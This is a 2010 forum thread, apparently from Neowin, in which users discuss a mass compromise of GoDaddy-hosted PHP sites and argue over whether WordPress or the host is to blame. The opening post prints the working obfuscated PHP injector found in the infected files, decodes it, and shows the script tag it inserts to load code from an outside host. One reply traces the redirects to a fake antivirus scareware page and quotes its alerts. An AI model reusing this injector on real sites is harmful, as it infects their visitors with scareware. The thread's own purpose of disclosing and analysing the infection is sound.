Jump to content



Photo

GoDaddy Got Hacked Yesterday


  • Please log in to reply
72 replies to this topic

#1 TonyLock

TonyLock

    Neowinian Senior

  • Joined: 23-July 02

Posted 02 May 2010 - 22:02

I'm sure some of you may be aware of the situation But as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy Tweeted about this matter (See Tweet: http://twitter.com/G...tus/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims, a friend has a site that only has her own hand written PHP code and nothing more. Despite taking my friend is super obsessive about security and knows for a fact her FTP account was not compromised, she found all the PHP files on her server to be infected, even those not publicly available.

When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>


When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>


When you decode this, it equates to:
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;
if(!function_exists('mrobh')){
if(!function_exists('gml')){
function gml(){
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");
}
return "";
}
}
if(!function_exists('gzdecode')){
function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
$RBE4C4D037E939226F65812885A53DAD9=10;
$RA3D52E52A48936CDE0F5356BB08652F2=0;
if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
$RBE4C4D037E939226F65812885A53DAD9+=2;
}
$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
}
return $R034AE2AB94F99CC81B389A1822DA3353;
}
}
function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
Header('Content-Encoding: none');
$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
}else{
return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
}
}
ob_start('mrobh');
}
}


I don't really understand what this code exactly does. Can any PHP code experts decipher it?

GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.

So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.


#2 +Cupcakes

Cupcakes

    #cupcakey { color: hot pink }

  • Joined: 12-May 09
  • Location: Chicago

Posted 02 May 2010 - 22:10

Hosting companies always love to jump on the Wordpress bandwagon as the reason for any security vulnerbilities.

http://wordpress.org...le-permissions/

#3 OP TonyLock

TonyLock

    Neowinian Senior

  • Joined: 23-July 02

Posted 02 May 2010 - 22:33

I know! My friend doesn't even use WordPress.

#4 HawkMan

HawkMan

    Neowinian Senior

  • Tech Issues Solved: 4
  • Joined: 31-August 04
  • Location: Norway
  • Phone: Noka Lumia 1020

Posted 02 May 2010 - 22:34

God Hacking

that's some serious business

#5 itzwolf

itzwolf

    Neowinian

  • Joined: 23-February 10
  • Location: Florida, The Someshine State

Posted 02 May 2010 - 22:38

Dang, first I've heard of this...

#6 +Cupcakes

Cupcakes

    #cupcakey { color: hot pink }

  • Joined: 12-May 09
  • Location: Chicago

Posted 02 May 2010 - 23:59

Yay I love that someone was so quick to jump on the bandwagon: http://www.neowin.ne...daddycom-hacked

Again, GODADDY is the one that's at fault NOT WORDPRESS. Yes, outdated Wordpress installs can reek havoc but if you read the above link in my other post, it's going to revolve around the SERVERS LACK OF SECURITY.

#7 hotdog963al

hotdog963al

    Meow

  • Joined: 28-November 04
  • Location: Cambridge, UK

Posted 03 May 2010 - 00:30

Yay I love that someone was so quick to jump on the bandwagon: http://www.neowin.ne...daddycom-hacked

That's extremely annoying to see on the front page. :pinch:

#8 OP TonyLock

TonyLock

    Neowinian Senior

  • Joined: 23-July 02

Posted 03 May 2010 - 00:41

This absolutely needs to be in th front page. However, it should be stated that it absolutely was not the fault of WordPress as claimed by GoDaddy.
No software should be blamed for the incompetency of a hosting company.
It was not a weak password issue, or a FTP key logger as GoDaddy just told my friend.
It was GoDaddy's lack of adequate security.
Perhaps GoDaddy has some legal issues here and so not to get their butts sued, they blame some software that's not even on their servers.

#9 vetAndrew Lyle

Andrew Lyle

    Don't Panic!

  • Joined: 15-December 03
  • Location: Toronto, Ontario
  • OS: Windows 7 SP1

Posted 03 May 2010 - 01:04

That's extremely annoying to see on the front page. :pinch:

You have to read:
www.twitter.com/GoDaddy and read all the complaints
and
http://community.god...it/?isc=smtwsup

GoDaddy understands its usually WordPress or weak FTP passwords.. With the amount of reports, this appears to be WordPress on GoDaddy servers.

#10 Singh400

Singh400

    Neowinian Senior

  • Joined: 02-February 10

Posted 03 May 2010 - 01:06

Any coding gods tell us what the quoted codes do? Out of sheer interest...

#11 vetAndrew Lyle

Andrew Lyle

    Don't Panic!

  • Joined: 15-December 03
  • Location: Toronto, Ontario
  • OS: Windows 7 SP1

Posted 03 May 2010 - 01:13

Here is another report:
http://wordpress.org...rt/topic/394255

Just google:

<script src="http://kdjkfjskdfjls....php"></script>

I have to be clear, nobody knows 100% what the cause is, but WordPress owners appear to be getting hacked, aside from the odd post here on Neowin, claiming that friends got hacked, without wordpress installed.

But we can all safely say that GoDaddy is the host of all these compromised websites, correct?

#12 +Cupcakes

Cupcakes

    #cupcakey { color: hot pink }

  • Joined: 12-May 09
  • Location: Chicago

Posted 03 May 2010 - 01:52

A server-wide occurrence is the fault of GoDaddy and not Wordpress (as expressed by seeing this issue with non-Wordpress accounts on effect GoDaddy servers.) Not only that but people also fail to understand to bring up any Wordpress plugins that they're using. Those can be the culprit and not even Wordpress itself.

Andrew, even in the Wordpress support link, you can also see that another user chimes in that it's not Wordpress-specific: http://blog.sucuri.n...tes-hacked.html

Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.

WordPress, like all other web applications, must store database connection info in clear text. Encrypting credentials doesn’t matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system — like they appeared to have in this case — it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

I’m not even going to link any of the articles because they have so many inaccuracies you become stupider by reading them.

If you’re a web host and you turn a bad file permissions story into a WordPress story, you’re doing something wrong.

P.S. Network Solutions, it’s “WordPress” not “Word Press.”



#13 RoomKid

RoomKid

    Banned

  • Joined: 12-October 09
  • Location: on my chair in front of the computer

Posted 03 May 2010 - 02:22

I've been hacked once too, there was this file encoded in Base64. To access the file, you need a password. So I opened that file in cPanel, and found out the password. When I got access, I was amazed. It was like a filemanager, I can edit/delete/create new files. There were hacking tools too. I deleted it, changed my passwords and everything else to make sure that I was safe.

#14 bytes2000

bytes2000

    Neowinian

  • Joined: 20-June 04

Posted 03 May 2010 - 03:26

I don't really understand what this code exactly does. Can any PHP code experts decipher it?



I have further checked the script via: http://web-sniffer.net/ and if you are not the Google Bot or YahooBot...
it redirects to: http://www4.suitcase...smYlGibZZqXlw==
It creates 7 cookies:

HTTP Response Header
Name Value Delim
Status: HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 03 May 2010 02:58:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.12
Set-Cookie: cid=1; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: uid=2045; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: bid=b_Unknown; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: ls=107; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: pid=3; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: pid_3=1; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: ls_3_107=1; expires=Tue, 04-May-2010 02:58:33 GMT


And then redirects you to:
and then it redirects you via HTTP 302 code to: http://www1.safetypc...3qqh9qilnFxbXA=

and then it finnally redirects you to a page with the following content:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><meta http-equiv="Content-Language" content="en"/><meta http-equiv="Cache-control" content="Public"/><title>Security Threat Analysis</title><link rel="icon" href="http://www.google.com/favicon.ico"/><link rel="SHORTCUT ICON" href="http://www.google.com/favicon.ico"/>
  
  
  <style type="text/css" media="screen">
    #loading {
      height:auto;
      left:45%;
      padding:2px;
      position:absolute;
      top:40%;
      z-index:20001;
    }
    #loading a {
      color:#225588;
    }
    #loading .loading-indicator {
      -x-system-font:none;
      background:white none repeat scroll 0 0;
      color:#444444;
      font-family:tahoma,arial,helvetica;
      font-size:13px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:bold;
      height:auto;
      line-height:normal;
      margin:0;
      padding:10px;
    }
    #loading-msg {
      -x-system-font:none;
      font-family:arial,tahoma,sans-serif;
      font-size:10px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:normal;
      line-height:normal;
    }
  </style></head><body>
  <div id="loading" style="display:block"><div class="loading-indicator"><img height="50" width="50" style="margin-right: 8px; float: left; vertical-align: top;" src="Images/loading.gif"/><br/><span id="loading-msg">Initializing process.</span></div></div>
<script type="text/javascript" src="107a447c72270a52ae79e796c983523e3a563008911.js"></script>
</body></html>

Good! my Symantec Endpoint antivirus blocked something and I cannot access: www1.safetypcwork5.net so I will continue investigating via web-sniffer

That page, shows a loading image and loads the following javascript code: http://www1.safetypc...e3a563008911.js

I did not post the whole code since it would detect a virus in this thread
basically it opens a fake system alerts like the following:

["To prevent damage to your computer, use CANCEL.","C"],["Your system is at risk of crash. Press CANCEL to prevent it.","C"],["Your system has been damaged due to recent virus attack. Press 'OK' to to fix it.","O"],["To improve performance of your PC press 'OK'.","O"],["Your PC is working slowly. Press 'OK' to check it.","O"]


I did not further check the complex javascript of this, but it is 1000% Malware... and I think this was caused by a Worm or maybe a virus exploting unpatched WP installs and not really brute forcing for weak passwords, because I think brute forcing is used mainly when they set your site as the target but we cannot tell if that worm affected the WP install, so its better to reinstall and continue using (if not already) safe passwords.

#15 GoDaddy

GoDaddy

    Neowinian

  • Joined: 03-May 10

Posted 03 May 2010 - 03:38

TonyLock and All,

I work on Go Daddy's Social Media Team and we're working with our Security Operations Center to locate examples of non-WordPress sites that have been compromised. If you're comfortable with sharing example domains, please feel free to PM them to me.

Please know that we're actively working to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK. As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware that were not WordPress blogs have the commonality that an outdated version of WordPress is either powering part of the site or that it is not in use, but is still present on the hosting plan. Additionally, we have heard reports of the compromise occurring on other hosting providers.

Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .

^Salem